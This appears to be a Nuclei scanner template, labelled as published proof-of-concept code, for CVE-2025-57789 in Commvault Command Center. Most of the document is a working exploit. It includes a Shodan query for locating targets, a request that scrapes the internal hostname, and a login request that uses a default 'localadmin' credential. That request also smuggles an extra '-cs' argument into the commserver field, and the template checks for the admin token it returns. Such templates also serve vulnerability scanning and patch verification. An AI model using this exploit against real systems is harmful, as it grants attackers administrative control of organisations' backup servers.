An issue was discovered in Commvault before 11.36.60.During the brief window between installation and the first administrator login, remote attackers may exploit the default credential to gain admin control. This is limited to the setup phase, before any jobs have been configured.
PoC代码[已公开]
id: CVE-2025-57789
info:
name: Commvault Initial Administrator Login Process Vulnerability
author: DhiyaneshDK,watchtowr
severity: medium
description: |
An issue was discovered in Commvault before 11.36.60.During the brief window between installation and the first administrator login, remote attackers may exploit the default credential to gain admin control. This is limited to the setup phase, before any jobs have been configured.
reference:
- https://labs.watchtowr.com/guess-who-would-be-stupid-enough-to-rob-the-same-vault-twice-pre-auth-rce-chains-in-commvault/
- https://documentation.commvault.com/securityadvisories/CV_2025_08_4.html
- https://nvd.nist.gov/vuln/detail/CVE-2025-57789
metadata:
verified: true
max-request: 2
shodan-query: http.favicon.hash:-542502280
tags: cve,cve2025,commandcenter,commvault,unauth
flow: http(1) && http(2)
http:
- method: GET
path:
- "{{BaseURL}}/commandcenter/publicLink.do"
extractors:
- type: regex
name: connection
group: 1
part: body
regex:
- '"activeMQConnectionURL":"tcp:\/\/(.*?):\d+.*"'
internal: true
- raw:
- |
POST /commandcenter/api/Login HTTP/1.1
Host: {{Hostname}}
Accept: application/json
Content-Type: application/json;charset=UTF-8
{
"username": "{{connection}}_localadmin__",
"password": "YSAtbG9jYWxhZG1pbg==",
"commserver": "{{connection}} -cs {{connection}}"
}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains_all(body, "userGUID","token")'
condition: and
# digest: 490a0046304402205142ef9c344ac365cb8cde06a6bf787ca98f8bda8b52c161c45dfedeb1252d380220771d8a75fd2fad22b8aaa1c56dae2ebda4d7ced10e26b7da551b9c7db73e8d3d:922c64590222798bb761d5b6d8e72950